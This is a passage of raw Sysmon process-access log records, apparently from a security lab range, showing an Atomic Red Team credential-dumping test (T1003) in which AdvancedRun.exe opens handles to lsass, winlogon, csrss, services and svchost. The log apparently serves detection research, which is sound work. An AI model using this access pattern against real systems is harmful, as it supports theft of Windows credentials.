dvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979941Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003979940Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003979939Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979938Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979937Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979936Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003979935Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979934Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979932Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979931Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979930Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.278{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979929Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.278{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979928Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.278{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979927Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.278{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979926Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.278{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979925Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.278{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979924Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
